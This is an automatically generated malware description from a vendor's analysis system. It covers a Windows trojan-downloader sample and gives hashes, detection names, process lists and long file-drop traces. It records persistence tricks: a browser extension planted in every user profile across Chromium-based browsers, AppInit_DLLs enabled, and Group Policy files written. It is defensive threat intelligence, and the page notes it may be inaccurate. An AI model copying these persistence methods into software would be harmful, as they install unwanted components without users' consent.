Trojan.GenericKD.1828389_065339e838

by malwarelabrobot on November 10th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.ihvy (Kaspersky), Trojan.GenericKD.1828389 (B) (Emsisoft), Trojan.GenericKD.1828389 (AdAware), Backdoor.Win32.PcClient.FD, Trojan-Downloader.Win32.Moure.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 065339e8387b04c2368bd0d97be93c50
SHA1: 2c7ecfc0980e7e714a5e42c74823f6b22912284c
SHA256: 8740614375fe89e670b62a1ae5231bcca902fbeb142972184bfdafe1a17d36cf
SSDeep: 6144:grnqcYK8nNZOnUJE8UdYCc63jlfLLMy9INUCcS4Epj:grqRfXINcMjNLMpytSpd
Size: 384512 bytes
File type: EXE
Platform: WIN32
Entropy: Probably Packed
PEID: UPolyXv05_v6
Company: AirInstaller Inc.
Created at: 2014-08-27 15:42:33
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been identified by the automated analysis. What the trace below does record is installer behaviour: %original file name%.exe drops qeO052T9N.exe and 4t0K2gExXKV.exe into %Temp%; qeO052T9N.exe unpacks a bundle under %Temp%\20182466 (a Chromium extension directory, a Firefox-style extension skeleton with install.rdf, bootstrap.js and chrome.manifest, the vWxdeLnb7d DLLs and gzfJ2GIHr9X.exe) and deletes it again once it has been used; 4t0K2gExXKV.exe installs a "Supporter 1.80" component under %Program Files%\Supporter and sets LoadAppInit_DLLs to 1; gzfJ2GIHr9X.exe copies the extension with id pclnmbgpjmkgjihmdggmkondchhibbmh into the Extensions directory of every local user profile (Administrator, Guest, HelpAssistant, SUPPORT_388945a0 and the current user) for Google Chrome, Chrome SxS, Comodo Dragon, Torch and Chromatic Browser, drops SaveClicker files under %Program Files% and All Users\Application Data, and writes %System%\GroupPolicy\Machine\Registry.pol and gpt.ini.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1904
qeO052T9N.exe:1356
rundll32.exe:892
rundll32.exe:1216
regsvr32.exe:1944
4t0K2gExXKV.exe:496
gzfJ2GIHr9X.exe:1288

The Trojan injects its code into the following process(es):
No code injection into other processes was observed.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe (650324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (352986 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (0 bytes)

The process qeO052T9N.exe:1356 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (6338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected] (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (3863 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (3837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (0 bytes)

The process 4t0K2gExXKV.exe:496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
%Program Files%\Supporter\Supporter.dll (272917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHIRSTUV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0RRGIZX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BYIBPPYK\desktop.ini (67 bytes)
%Program Files%\Supporter\SupporterSvc.dll (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZFJLCPJB\desktop.ini (67 bytes)

The process gzfJ2GIHr9X.exe:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dat (260 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.dat (260 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\All Users\Application Data\f362fc35c4a3dbfb\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}.20141109042007 (186 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%System%\GroupPolicy\Machine\Registry.pol (264 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe (26944 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.tlb (259 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.x64.dll (30600 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%System%\GroupPolicy\gpt.ini (315 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
